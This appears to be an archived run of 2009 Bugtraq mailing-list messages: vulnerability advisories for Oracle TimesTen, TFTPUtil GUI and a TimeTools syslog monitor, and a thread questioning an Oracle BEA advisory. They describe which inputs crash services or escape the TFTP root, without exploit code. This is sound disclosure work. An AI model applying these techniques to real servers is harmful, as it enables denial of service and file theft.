MDc6MzkuNTkgSW5mbzogICAgOiAxODc4ODogTGlzdGVuZXIgdGVybWluYXRpbmcNCjE5OjA3OjM5
LjU5IEluZm86ICAgIDogMTg3OTE6IExpc3RlbmVyIGV4aXRlZCwgdGVybWluYXRpb24gZmluaXNo
aW5nDQoxOTowNzozOS41OSBJbmZvOiAgICA6IDE4NzkxOiBQcm9jZXNzIHRlcm1pbmF0aW9uIGNv
bXBsZXRlDQoxOTowNzozOS41OSBJbmZvOiAgICA6IDE4NzgyOiBMaXN0ZW5lciBleGl0ZWQsIHRl
cm1pbmF0aW9uIGZpbmlzaGluZw0KMTk6MDc6MzkuNTkgSW5mbzogICAgOiAxODc4MjogUHJvY2Vz
cyB0ZXJtaW5hdGlvbiBjb21wbGV0ZQ0KMTk6MDc6MzkuNTkgSW5mbzogICAgOiAxODc4ODogTGlz
dGVuZXIgZXhpdGVkLCB0ZXJtaW5hdGlvbiBmaW5pc2hpbmcNCjE5OjA3OjM5LjU5IEluZm86ICAg
IDogMTg3ODg6IFByb2Nlc3MgdGVybWluYXRpb24gY29tcGxldGUNCjE5OjA3OjQwLjU5IEluZm86
IFNSVjogMTg4MDA6IEV2ZW50SUQ9MnwgVGltZXNUZW4gU2VydmVyIGlzIHN0b3BwaW5nDQoxOTow
Nzo0MC41OSBJbmZvOiBTUlY6IDE4ODAwOiBFdmVudElEPTk5fCBTZXJ2ZXIgdHJ5aW5nIHRvIHN0
b3AgY2hpbGQgc2VydmVyIHByb2Nlc3Nlcw0KMTk6MDc6NDAuNTkgSW5mbzogU1JWOiAxODgwMDog
RXZlbnRJRD0xMXwgTWFpbiBTZXJ2ZXIgY2xlYW5lZCB1cCBhbGwgY2hpbGQgc2VydmVyIHByb2Nl
c3NlcyBhbmQgZXhpdGluZw0KKC4uLikNCg0KVGhlIGxhc3QgbXNnIHBhcmFtZXRlcidzIHZhbHVl
IGNyYXNoZXMgdGhlIHRpbWVzdGVuZCBkYWVtb24uIEF0dGFjaGluZyB3aXRoDQphIGRlYnVnZ2Vy
IHRvIHRoZSB0aW1lc3RlbmQgZGFlbW9uIHdlIGNhbiBzZWUgdGhlIGZvbGxvd2luZyBkdW1wIHdo
ZW4gaXQNCmNyYXNoZXM6IA0KDQokIHN1ZG8gL2V0Yy9pbml0LmQvdHRfNzAgc3RhcnQgJg0KKC4u
LikNCiQgc3VkbyBnZGIgYXR0YWNoIGBjYXQgL3Zhci9UaW1lc1Rlbi90dDcwL3RpbWVzdGVuZC5w
aWRgDQooLi4uKQ0KKGdkYikgYw0KKC4uLikNClByb2dyYW0gcmVjZWl2ZWQgc2lnbmFsIFNJR1NF
R1YsIFNlZ21lbnRhdGlvbiBmYXVsdC4NCltTd2l0Y2hpbmcgdG8gVGhyZWFkIC0xMjIzMzg2MTky
IChMV1AgMTg5ODApXQ0KMHhiNzZjZjVjNiBpbiB2ZnByaW50ZiAoKSBmcm9tIC9saWIvdGxzL2k2
ODYvY21vdi9saWJjLnNvLjYNCihnZGIpIHdoZXJlDQojMCAgMHhiNzZjZjVjNiBpbiB2ZnByaW50
ZiAoKSBmcm9tIC9saWIvdGxzL2k2ODYvY21vdi9saWJjLnNvLjYNCiMxICAweGI3NmVjYTM2IGlu
IHZzbnByaW50ZiAoKSBmcm9tIC9saWIvdGxzL2k2ODYvY21vdi9saWJjLnNvLjYNCiMyICAweGI3
ODI2ZGRiIGluIHR0Y192c25wcmludGYgKCkgZnJvbSAvb3B0L1RpbWVzVGVuL3R0NzAvbGliL2xp
YnR0Y28uc28NCiMzICAweDA4MDc2ODlmIGluIHR0ZExvZ0R1bXAgKCkNCiM0ICAweDA4MDViMTM4
IGluIGRhSGFuZGxlciAoKQ0KIzUgIDB4MDgwNzM3ODkgaW4gaGFuZGxlclRocmVhZCAoKQ0KIzYg
IDB4Yjc3ZTczNDEgaW4gc3RhcnRfdGhyZWFkICgpIGZyb20gL2xpYi90bHMvaTY4Ni9jbW92L2xp
YnB0aHJlYWQuc28uMA0KIzcgIDB4Yjc3NWE0ZWUgaW4gY2xvbmUgKCkgZnJvbSAvbGliL3Rscy9p
Njg2L2Ntb3YvbGliYy5zby42DQooZ2RiKSBpIHINCmVheCAgICAgICAgICAgIDB4MCAgICAgIDAN
CmVjeCAgICAgICAgICAgIDB4NCAgICAgIDQNCmVkeCAgICAgICAgICAgIDB4MCAgICAgIDANCmVi
eCAgICAgICAgICAgIDB4Yjc3YmJhZGMgICAgICAgLTEyMTY2MjgwMDQNCmVzcCAgICAgICAgICAg
IDB4YjcxNDgwYzAgICAgICAgMHhiNzE0ODBjMA0KZWJwICAgICAgICAgICAgMHhiNzE0ODZlMCAg
ICAgICAweGI3MTQ4NmUwDQplc2kgICAgICAgICAgICAweDAgICAgICAwDQplZGkgICAgICAgICAg
ICAweGI3MTQ4OTVjICAgICAgIC0xMjIzMzkwODg0DQplaXAgICAgICAgICAgICAweGI3NmNmNWM2
ICAgICAgIDB4Yjc2Y2Y1YzYgPHZmcHJpbnRmKzE0MDM4Pg0KKC4uLikNCg0KVGhlIGZ1bmN0aW9u
IHR0ZExvZ0R1bXAgaXMgY2FsbGVkIGZyb20gZGFIYW5kbGVyIGFzIHlvdSBjYW4gc2VlIGluIHRo
ZSANCmJhY2t0cmFjZS4gVGhpcyBmdW5jdGlvbiBpcyB0aGUgbWFpbiBoYW5kbGVyIGZvciB0aGUg
aW50ZXJuYWwgdGltZXN0ZW5kJ3Mgd2ViDQpzZXJ2ZXIuIFRoaXMgaXMgdGhlIHZ1bG5lcmFibGUg
ZnVuY3Rpb24sIHR0ZExvZ0R1bXAsIHdoaWNoIHJlY2VpdmVzIG9uZSANCmFyZ3VtZW50ICh0aGUg
bXNnIHBhcmFtZXRlciB0byB0aGUgZXZ0ZHVtcCBwc2V1ZG8gY2dpKToNCg0KKC4uLikNCi50ZXh0
OjA4MDc2ODZEIHR0ZExvZ0R1bXAgICAgICBwcm9jIG5lYXIgICAgICAgICAgICAgICA7IENPREUg
WFJFRjogZGFIYW5kbGVyKzVGMxhwDQooLi4uKQ0KLnRleHQ6MDgwNzY4NzkgICAgICAgICAgICAg
ICAgIGxlYSAgICAgZWF4LCBbZWJwK2FyZ1JldF0NCi50ZXh0OjA4MDc2ODdDICAgICAgICAgICAg
ICAgICBwdXNoICAgIGVheA0KLnRleHQ6MDgwNzY4N0QgICAgICAgICAgICAgICAgIHB1c2ggICAg
W2VicCthcmdNc2ddIDsgVXNlciBjb250cm9sbGVkIHN0cmluZyBidWZmZXINCi50ZXh0OjA4MDc2
ODgwICAgICAgICAgICAgICAgICBwdXNoICAgIDANCi50ZXh0OjA4MDc2ODgyICAgICAgICAgICAg
ICAgICBwdXNoICAgIDEwMGgNCi50ZXh0OjA4MDc2ODg3ICAgICAgICAgICAgICAgICBsZWEgICAg
IGVzaSwgW2VicCtidWZdDQoudGV4dDowODA3Njg4RCAgICAgICAgICAgICAgICAgY2FsbCAgICAk
KzUNCi50ZXh0OjA4MDc2ODkyICAgICAgICAgICAgICAgICBwb3AgICAgIGVieA0KLnRleHQ6MDgw
NzY4OTMgICAgICAgICAgICAgICAgIGFkZCAgICAgZWJ4LCAzMjE3QWgNCi50ZXh0OjA4MDc2ODk5
ICAgICAgICAgICAgICAgICBwdXNoICAgIGVzaQ0KLnRleHQ6MDgwNzY4OUEgICAgICAgICAgICAg
ICAgIGNhbGwgICAgX3R0Y192c25wcmludGYNCiguLi4pDQoNClRoZSBmdW5jdGlvbiB0dGNfdnNu
cHJpbnRmIG1ha2VzIGEgY2FsbCBpbnRlcm5hbGx5IHRvIHRoZSB2c25wcmludGYgZnVuY3Rpb24N
CihpbiB0aGUgbGlicmFyeSAvb3B0L1RpbWVzVGVuL3R0NzAvbGliL2xpYnR0Y28uc28pIHBhc3Np
bmcgYXMgdGhlIGJ1ZmZlciB0bw0KYmUgcHJpbnRlZCB0aGUgdXNlciBzdXBwbGllZCB2YWx1ZSBw
YXNzZWQgdG8gdGhlICJtc2ciIGFyZ3VtZW50Og0KICAgIA0KLnRleHQ6MDAwMUFEQUEgdHRjX3Zz
bnByaW50ZiAgIHByb2MgbmVhciAgICAgICAgICAgICAgIDsgQ09ERSBYUkVGOiBtc2didWZfZXJy
b3IrNzMYcA0KLnRleHQ6MDAwMUFEQUEgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgIDsgb3B0X2Vycm9yKzgzGHAgLi4uDQoudGV4dDowMDAxQURBQQ0KKC4uLikNCi50ZXh0
OjAwMDFBRENFICAgICAgICAgICAgICAgICBwdXNoICAgIFtlYnArYXJnXSAgICAgICA7IGFyZw0K
LnRleHQ6MDAwMUFERDEgICAgICAgICAgICAgICAgIHB1c2ggICAgW2VicCthcmdGb3JtYXRdIDsg
Zm9ybWF0DQoudGV4dDowMDAxQURENCAgICAgICAgICAgICAgICAgcHVzaCAgICBlZGkgICAgICAg
ICAgICAgOyBtYXhsZW4NCi50ZXh0OjAwMDFBREQ1ICAgICAgICAgICAgICAgICBwdXNoICAgIGVh
eCAgICAgICAgICAgICA7IHMNCi50ZXh0OjAwMDFBREQ2ICAgICAgICAgICAgICAgICBjYWxsICAg
IF92c25wcmludGYNCiguLikNCg0KV29ya2Fyb3VuZA0KPT09PT09PT09PQ0KDQpOb25lLg0KDQpQ
YXRjaCBpbmZvcm1hdGlvbg0KPT09PT09PT09PT09PT09PT0NCg0KT3JhY2xlIGZpeGVkIHRoZSB2
dWxuZXJhYmlsaXR5IGluIHZlcnNpb24gNy4wLjUuMS4wIG9mIE9yYWNsZSBTZWN1cmUgQmFja3Vw
Lg0KDQpDb250YWN0IEluZm9ybWF0aW9uDQo9PT09PT09PT09PT09PT09PT09DQoNClRoZSB2dWxu
ZXJhYmlsaXR5IHdhcyBmb3VuZCBieSBKb3hlYW4gS29yZXQsIGFkbWluW2F0XWpveGVhbmtvcmV0
W2RvdF1jb20NCg0KUmVmZXJlbmNlcw0KPT09PT09PT09PQ0KDQpPcmFjbGUgVGltZXNUZW4gZXZ0
RHVtcCBSZW1vdGUgRm9ybWF0IFN0cmluZyBWdWxuZXJhYmlsaXR5Og0KaHR0cDovL3d3dy56ZXJv
ZGF5aW5pdGlhdGl2ZS5jb20vYWR2aXNvcmllcy9aREktMDktMDA0Lw0KDQpPcmFjbGUgQ3JpdGlj
YWwgUGF0Y2ggVXBkYXRlIEphbnVhcnkgMjAwOToNCmh0dHA6Ly93d3cub3JhY2xlLmNvbS90ZWNo
bm9sb2d5L2RlcGxveS9zZWN1cml0eS9jcml0aWNhbC1wYXRjaC11cGRhdGVzL2NwdWphbjIwMDku
aHRtbA0KDQpQZXJtYW5lbnQgVmVyc2lvbiBvZiB0aGUgYWR2aXNvcnk6DQpodHRwOi8vam94ZWFu
a29yZXQuY29tL2Jsb2cvP3A9NDENCg0KUHJvZmVzc2lvbmFsIFdlYjoNCmh0dHA6Ly93d3cuam94
ZWFua29yZXQuY29tDQoNClBlcnNvbmFsIEJsb2c6DQpodHRwOi8vd3d3LmpveGVhbmtvcmV0LmNv
bS9ibG9nDQoNCkRpc2NsYWltZXINCj09PT09PT09PT0NCg0KVGhlIGluZm9ybWF0aW9uIGluIHRo
aXMgYWR2aXNvcnkgYW5kIGFueSBvZiBpdHMgZGVtb25zdHJhdGlvbnMgaXMgcHJvdmlkZWQgImFz
IGlzIg0Kd2l0aG91dCBhbnkgd2FycmFudHkgb2YgYW55IGtpbmQuDQoNCkkgYW0gbm90IGxpYWJs
ZSBmb3IgYW55IGRpcmVjdCBvciBpbmRpcmVjdCBkYW1hZ2VzIGNhdXNlZCBhcyBhIHJlc3VsdCBv
ZiB1c2luZyB0aGUNCmluZm9ybWF0aW9uIG9yIGRlbW9uc3RyYXRpb25zIHByb3ZpZGVkIGluIGFu
eSBwYXJ0IG9mIHRoaXMgYWR2aXNvcnkuDQoNCn=

--=-Y1d5wnjF15zP9y7LtuBL--

--=-FHE+nIKLYvfBYNKSgYeb
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQBJblCxU6rFMEYDrlERAvfmAKCfnouWGL44+W+m6QhCXFyEVfe9oQCePOai
gBwnwN7WacqQnTmRlcUhk0g=SPQv
-----END PGP SIGNATURE-----

--=-FHE+nIKLYvfBYNKSgYeb--



______________________________________________ 
LLama Gratis a cualquier PC del Mundo. 
Llamadas a fijos y msviles desde 1 cintimo por minuto. 
http://es.voice.yahoo.com

From - Thu Jan 15 11:22:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000059ed
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39186-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 7CDFCED8FA
for <lists@securityspace.com>; Thu, 15 Jan 2009 11:14:48 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id D8429237407; Thu, 15 Jan 2009 08:39:02 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 24403 invoked from network); 14 Jan 2009 23:59:56 -0000
Date: Wed, 14 Jan 2009 17:04:35 -0700
Message-Id: <200901150004.n0F04ZJQ028021@www3.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: vuln_research@princeofnigeria.org
To: bugtraq@securityfocus.com
Subject: TFTPUtil GUI TFTP Directory Traversal
Status:   

Title: TFTPUtil GUI TFTP Directory Traversal
Product: TFTPUtil GUI

Discovered: November 26, 2008
Discovered by: Rob Kraus, princeofnigeria (PoN)

Vendor: k23productions
Vendor URL: http://sourceforge.net/projects/tftputil
Vendor notification date: December 1, 2008
Vendor response date: December 8, 2008
Vendor acknowledgement: December 8, 2008
Vendor provided fix: December 8, 2008
Release coordinated with the vendor: --
Public disclosure date: January 14, 2009

Affects: TFTPUtil GUI versions 1.2.0 and 1.3.0
Fixed in: 1.4.0
Risk: Medium

Vulnerability Description: TFTPUtil GUI versions 1.2.0 and 1.3.0 are prone to a directory-traversal vulnerability because it fails to sanitize TFTP GET requests. By using a specially crafted TFTP GET request an attacker is capable of retrieving files outside of the TFTP root directory.

Impact: The ability to obtain files outside of the TFTP root directory may allow an attacker to obtain more information about the underlying operating system and applications running on the host.

Keywords: security, vulnerability, tftp, directory traversal, princeofnigeria, gui, windows, server

[--Background--]

Type of vulnerability: Input validation flaw
Who can exploit it: Local and remote users

TFTPUtil GUI is an application that provides services for transferring configuration files, firmware files and other types of data using the TFTP protocol. The application should restrict GET requests to the contents of the TFTP root directory to prevent obtaining data from other parts of the host operating system.

Vulnerability Scope: The default installation of TFTPUtil 1.20. or 1.3.0 will allow exploitation of this vulnerability.

[--More Details--]

Exploitation of this flaw is trivial and can be executed using any RFC 1350 compliant TFTP client software. No exploit code is required.

[--Fix or Workaround Information--]

Patch availability: 1.4.0
Vendor provided fix: 1.4.0
Workarounds: Update to 1.4.0

[--Disclosure Policy--]

PrinceofNigeria.org Vulnerability Disclosure Policy
http://www.princeofnigeria.org/blogs/index.php/vulndev/vulnreleasepolicy/?blog=1

[--Disclosure History--]

Public disclosure date: January 14, 2009

[--References--]
CVE-ID:
Bugtraq ID:
Secunia ID:
OSVDB ID:

[--Author--]
Rob Kraus, princeofnigeria (PoN)
Website: www.princeofnigeria.org/blogs

From - Thu Jan 15 11:32:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000059ee
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39187-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 75B0BED906
for <lists@securityspace.com>; Thu, 15 Jan 2009 11:24:11 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 0A74123740A; Thu, 15 Jan 2009 08:39:36 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 24568 invoked from network); 15 Jan 2009 00:09:51 -0000
Date: Wed, 14 Jan 2009 17:16:07 -0700
Message-Id: <200901150016.n0F0G7Fs025883@www5.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: vuln_research@princeofnigeria.org
To: bugtraq@securityfocus.com
Subject: TFTPUtil GUI TFTP Server Denial of Service Vulnerability
Status:   

[--Vulnerability Summary--]

Title: TFTPUtil GUI TFTP Server Denial of Service Vulnerability
Product: TFTPUtil GUI

Discovered: November 26, 2008
Discovered by: Rob Kraus, princeofnigeria (PoN)

Vendor: k23productions (as per various download sites)
Vendor URL: http://sourceforge.net/projects/tftputil
Vendor notification date: December 1, 2008
Vendor response date: December 8, 2008
Vendor acknowledgment: December 8, 2008
Vendor provided fix: December 8, 2008
Release coordinated with the vendor: --
Public disclosure date: January 14, 2009

Affects: TFTPUtil GUI versions 1.2.0 and 1.3.0
Fixed in: 1.4.0
Risk: High

Vulnerability Description: TFTPUtil GUI versions 1.2.0 and 1.3.0 are vulnerable to a remote denial-of-service vulnerability because it fails to handle user-supplied input. Sending a specially crafted TFTP request with a overlong filename will cause the application to become unstable and stop responding.

Impact: A remote or local attacker can exploit this flaw by sending a specially crafted packet to the TFTP server. Successful exploitation of this flaw will cause the TFTP server process to crash preventing valid users or devices from using the service. The TFTP server will need to be restarted to resume normal TFTP server operations.

Keywords: security, vulnerability, tftp, dos, princeofnigeria, gui, windows, server, denial, service

[--Background--]

Type of vulnerability: Input validation flaw
Who can exploit it: Local or Remote users

TFTPUtil GUI is an application that provides services for transferring configuration files, firmware files and other types of data using the TFTP protocol. The application should validate and sanitize all user input to prevent unexpected conditions.

Vulnerability Scope: The default installation of TFTPUtil 1.20. or 1.3.0 will allow exploitation of this vulnerability.

[--More Details--]

Exploitation of this flaw is trivial and can be executed using any RFC 1350 compliant TFTP client software. No exploit code is required.

[--Fix or Workaround Information--]

Patch availability: 1.4.0
Vendor provided fix: 1.4.0
Workarounds: Upgrade to version 1.4.0 addresses this vulnerability

[--Disclosure Policy--]

PrinceofNigeria.org Vulnerability Disclosure Policy
http://www.princeofnigeria.org/blogs/index.php/vulndev/vulnreleasepolicy/?blog=1

[--Disclosure History--]

Public disclosure date: January 14, 2009

[--References--]
CVE-ID:
Bugtraq ID:
Secunia ID:
OSVDB ID:

[--Author--]
Rob Kraus, princeofnigeria (PoN)
Website: www.princeofnigeria.org/blogs

From - Thu Jan 15 11:38:13 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000059ef
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39188-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id C3A51ED879
for <lists@securityspace.com>; Thu, 15 Jan 2009 11:33:11 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 0499F23740B; Thu, 15 Jan 2009 08:40:37 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 24679 invoked from network); 15 Jan 2009 00:16:10 -0000
Date: Wed, 14 Jan 2009 17:20:49 -0700
Message-Id: <200901150020.n0F0Knf7030408@www3.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: vuln_research@princeofnigeria.org
To: bugtraq@securityfocus.com
Subject: Windows NTP Time Server Syslog Monitor 1.0.000 Denial of Service
 Vulnerability
Status:   

[--Vulnerability Summary--]

Title: Windows NTP Time Server Syslog Monitor 1.0.000 Denial of Service Vulnerability
Product: Windows NTP Time Server Syslog Monitor 1.0.000

Discovered: November 29, 2008
Discovered by: Rob Kraus, princeofnigeria (PoN)

Vendor: TimeTools
Vendor URL: http://www.timetools.co.uk
Vendor notification date: December 1, 2008
Vendor response date: --
Vendor acknowledgment:--
Vendor provided fix:--
Release coordinated with the vendor: --
Public disclosure date: January 14, 2009

Affects: Windows NTP Time Server Syslog Monitor 1.0.000
Fixed in: No fix currently available.
Risk: High

Vulnerability Description: Windows NTP Time Server Syslog Monitor 1.0.000 is vulnerable to a remote denial-of-service vulnerability because it fails to handle user-supplied input. Sending a specially crafted UDP Syslog request will cause the application to become unstable and stop responding.

Impact: A remote or local attacker can exploit this flaw by sending a specially crafted packet to the Syslog server. Successful exploitation of this flaw will cause the Syslog server process to crash preventing valid users or devices from using the service. The Syslog server will need to be restarted to resume normal Syslog server operations.

Keywords: security, vulnerability, syslog, princeofnigeria, windows, server, udp, dos, denial of service

[--Background--]

Type of vulnerability: Input validation flaw
Who can exploit it: Local or Remote users

Windows NTP Time Server Syslog Monitor 1.0.000 is an application that provides services for receiving system event messages to provide a centralized reporting interface for distributed system events. The application should validate and sanitize all user input to prevent unexpected conditions.

Per software download sites description: TimeTools Windows Atomic Clock NTP Server Syslog Daemon is a free utility that runs on any Windows NT/2000/XP/2003 workstation or server. It allows any syslog messages from any Linux or Unix based syslog client to be logged and displayed.

Vulnerability Scope: The default installation of Windows NTP Time Server Syslog Monitor 1.0.000 will allow exploitation of this vulnerability.

[--More Details--]

Exploitation of this flaw can be executed by sending a specially crafted UDP to the target server. No exploit code is required.

[--Fix or Workaround Information--]

Patch availability: None
Vendor provided fix: None
Workarounds: None available at this time, design flaw. Discontinue use of this product until a stable patch is released.

[--Disclosure Policy--]

PrinceofNigeria.org Vulnerability Disclosure Policy
http://www.princeofnigeria.org/blogs/index.php/vulndev/vulnreleasepolicy/?blog=1

[--Disclosure History--]

Public disclosure date: January 14, 2009

[--References--]
CVE-ID:
Bugtraq ID:
Secunia ID:
OSVDB ID:

[--Author--]
Rob Kraus, princeofnigeria (PoN)
Website: www.princeofnigeria.org/blogs

From - Thu Jan 15 11:42:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000059f0
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39189-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id C9698ED8BE
for <lists@securityspace.com>; Thu, 15 Jan 2009 11:41:53 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 58D1323740E; Thu, 15 Jan 2009 08:41:08 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 24963 invoked from network); 15 Jan 2009 00:37:15 -0000
Date: Thu, 15 Jan 2009 01:01:06 +0000 (UTC)
From: security curmudgeon <jericho@attrition.org>
To: bugtraq@securityfocus.com
Cc: trees@assurent.com, support@bea.com,
Oracle Security Alerts <secalert_us@oracle.com>
Subject: Re: Assurent VR - Oracle BEA WebLogic Server Apache Connector Buffer
 Overflow
In-Reply-To: <20090113225723.79AD368018E@sticky.vrt.telus.com>
Message-ID: <Pine.LNX.4.64.0901150040320.13704@forced.attrition.org>
References: <20090113225723.79AD368018E@sticky.vrt.telus.com>
X-Attrition: Attrition is only good when forced. http://attrition.org
X-OSVDB: Everything is vulnerable. http://osvdb.org
X-Message-Flag: WARNING: Over 75 security vulnerabilities in Microsoft Outlook as of Feb 15 2008!
X-Copyright: This e-mail copyright 2008 by jericho@attrition.org where applicable
X-Encryption: rot26
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Status:   



Hello Assurent & Oracle,

On Tue, 13 Jan 2009, VR-Subscription-noreply@assurent.com wrote:

: Oracle BEA WebLogic Server Apache Connector Buffer Overflow

: Reference: http://www.bea.com/weblogic/server/

: 2. Vulnerability Summary

: A remotely exploitable vulnerability has been discovered in the Apache 
: Connector component of Oracle BEA WebLogic Server. Specifically, the 
: vulnerability is due to a boundary error when processing incoming HTTP 
: requests and can lead to a buffer overflow condition. This boundary 
: error can lead to a Denial of Service (DoS) condition for the Apache 
: HTTP server.

: 3. Vulnerability Analysis

: A remote unauthenticated attacker can exploit the vulnerability by 
: sending a malicious HTTP request to the target system. A successful 
: attack will result in a Denial of Service (DoS) condition for the Apache 
: HTTP server, including all Apache-negotiated HTTP traffic to the 
: WebLogic Server.

: Reference: https://support.bea.com/application_content/product_portlets/securityadvisories/2809.html

According to Assurent, this is a remote overflow that creates a DoS 
condition. No mention of running arbitrary code.

Oracle's advisory says:

CVSS Severity Score: 10.0 (High)
Attack Range (AV): Network
Attack Complexity (AC): Low 
Authentication Level (Au): None 
Impact Type:Complete confidentiality, integrity and availability violation 
Vulnerability Type: Denial of Service 
CVSS Base Score Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)

So it is a "Denial of Service" but results in a complete compromise of 
confidentiality, integrity and availability. A 10.0 score typically means 
remote, unauthenticated execution of attacker-controlled code. Which is 
correct?

Further, Oracle's advisory says this affects "Security vulnerability in 
WebLogic plug-ins for Apache, Sun and IIS Web servers", implying this 
affects multiple plug-ins, not just the one for Apache. The advisory also 
uses this wording further suggesting three separate plug-ins: "This 
vulnerability may impact the availability, confidentiality or integrity of 
WebLogic Server applications, which use the Apache, Sun or IIS web server 
configured with the WebLogic plug-in for Apache, Sun or IIS respectively."

Is it really one plug-in that works with all three? Or does this only 
affect an Apache plug-in?

From - Thu Jan 15 11:52:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000059f1
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39190-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 7C4E7ED946
for <lists@securityspace.com>; Thu, 15 Jan 2009 11:52:05 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id DC71323740F; Thu, 15 Jan 2009 08:41:28 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 29594 invoked from network); 15 Jan 2009 01:58:42 -0000
X-Cloudmark-SP-Filtered: true
X-Cloudmark-SP-Result: v=1.0 c=0 a=FLhA3KDuAAAA:8 a=sMBj6sIwAAAA:8 a=OiwHJyw95A9GqVJ-TlkA:9 a=ClWkUrfSGXZlQU7twDwA:7 a=WmnnRX-Gkimm3A8DqAKQPJH77f0A:4 a=PRHNZNJDFyAA:10 a=R2VQutpenNgA:10 a=8UiCvUyRy1oA:10
To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:011 ] virtualbox
Date: Wed, 14 Jan 2009 19:29:00 -0700
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
